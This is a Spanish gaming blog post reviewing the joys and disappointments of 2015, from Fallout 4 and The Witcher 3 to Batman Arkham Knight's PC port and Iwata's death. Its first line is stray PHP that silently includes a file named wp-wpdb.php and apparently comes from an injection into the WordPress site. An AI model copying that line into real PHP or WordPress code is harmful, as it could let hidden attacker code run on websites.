if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Resumen de 2015: alegrías y decepciones – La Fortaleza de LeChuck

Resumen de 2015: alegrías y decepciones

El 2015 ha sido un año intenso para el videojuego en muchos aspectos, hemos tenido buenas ideas originales, nuevas entregas de sagas populares y anuncios que devolvían la ilusión a muchos jugones. Sin embargo, también hemos tenido algunas decepciones. Este es mi repaso de lo más destacado de 2015.

2015-juegos-noticias

flecha

  • Pisar de nuevo el yermo en Fallout 4: el título más esperado de Bethesda volvió para alegría de sus fans, y aunque tiene sus defectos, la adicción y el placer de recorrer el yermo sigue ahí.
  • La vuelta de la época dorada de los CRPG con Pillars of Eternity: el Kickstarter de Obsidian fue uno de los primeros crowdfunding, y de los más exitosos, y este año por fin llegó la culminación de todos los años de trabajo con un título soberbio y el verdadero legado de Baldur’s Gate.
  • El anuncio de Shenmue 3: en el E3 de Sony el sueño de muchos fans se hizo realidad, luego apareció un kickstarter que rompió récords, aunque el deseo de más dinero y que Sony estuviera detrás creó desconfianza.
  • El remake de Final Fantasy VII está en marcha: tendremos remake de FFVII pero van a cambiar bastantes las cosas: no será el mismo sistema de combate y Square-Enix confirmó que se lanzaría por episodios, lo cual ha hecho saltar todas las alarmas, y las carteras.
  • The Last Guardian no estaba muerto, estaba de parranda: el inicio de la conferencia de Sony con el tráiler de The Last Guardian fue de infarto. Bueno, 6 años de espera y unos pequeños olvidos de renovación de marcas después, The Last Guardian sigue vivo y en 2016 lo veremos, o eso espero.
  • Ya se pueden devolver juegos en Steam: si no te gusta te devolvemos en dinero, bien por la plataforma de Gabe.
  • La despedida-homenaje de Dragon Age Inquisition: el último DLC Intruso de Dragon Age Inquisition cierra la historia con el amargo y bonito recuerdo de la última aventura con nuestros compañeros, posiblemente de lo poco destacable del último título de Bioware.
  • El trabajo titánico de CD Projekt Red: las cosas cuando se hacen bien y con amor se notan y así salen a la luz juegos tan espectaculares como The Witcher 3, título capaz de encandilar tanto a los fans de la saga como a recién llegados.
  • Volver a jugar a un simulador decente de ciudades: Cities Skylines recoge el testigo que lanzó EA al vacío con un juego divertidísimo de creación y gestión de ciudades. Gracias Paradox.
  • La retrocompatibilidad en Xbox One: poder jugar a juegos de la anterior generación en la actual debería ser uno de los principales pilares de las compañías, y aunque sea algo tarde, se agradece el esfuerzo de Microsoft.

 

flecha2

  • La falta de pantalla partida de Halo 5: marearon la perdiz durante meses hasta romper una tradición y traicionar así a muchos jugadores de pantalla partida.
  • The Order 1886, lo que pudo ser y no fue: tenía mucho potencial y podría haber ofrecido mucho más, pero habrá que esperarse a una segunda parte.
  • Evolve, el quiero y no puedo de 2K: un juego que en sus inicios prometía ser la leche hasta que jugabas y te dabas cuenta de la cruda realidad.
  • La peor versión de Final Fantasy VI en Steam: a Square-Enix no se le ha ocurrido peor idea que traernos la versión móvil a PC de uno de los mejores (o el mejor) Final Fantasy. Los sprites duelen a la vista.
  • EA y Star Wars Battlefront: muchos modos multijugador y buena ambientación, pero se siente vacío y el pagar por el season pass no es muy esperanzador.
  • MGSV, Kojima y el dramón con Konami: la última entrega de la popular saga de Kojima ha dividido a la comunidad, algunos la aman, otros la odian, pero sin duda lo que más ha dado que hablar ha sido el rifirrafe de Kojima con Konami, desde la cancelación del proyecto Silent Hills con Guillermo del Toro hasta la prohibición de Konami para que Kojima no subiera al escenario de los Game Awards.
  • El desastre de Batman Arkham Knight en PC: la lamentable versión de PC encendió la ira de los peceros, un desastre que esperamos que no vuelva a ocurrir.
  • El visto y no visto de Assassin Creed Syndicate: después del terrible AC: Unity, los jugones fueron cautos y no arriesgaron con Syndicate, que ha pasado con más pena que gloria.
  • Iwata nos dejó: el entrañable presidente de Nintendo perdió su lucha contra el Cáncer. La industria pierde a un gran icono. RIP.

En comparación con el año anterior, 2015 nos ha hecho disfrutar de lo lindo con muchos títulos, sin embargo, la gran mayoría sigue siendo multiplataforma o exclusivos de PC/Steam, plataforma de juego donde más he disfrutado sin duda este año. En 2016 promete ser igual o más espectacular y aquí estaremos para contároslo.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

Dejar un comentario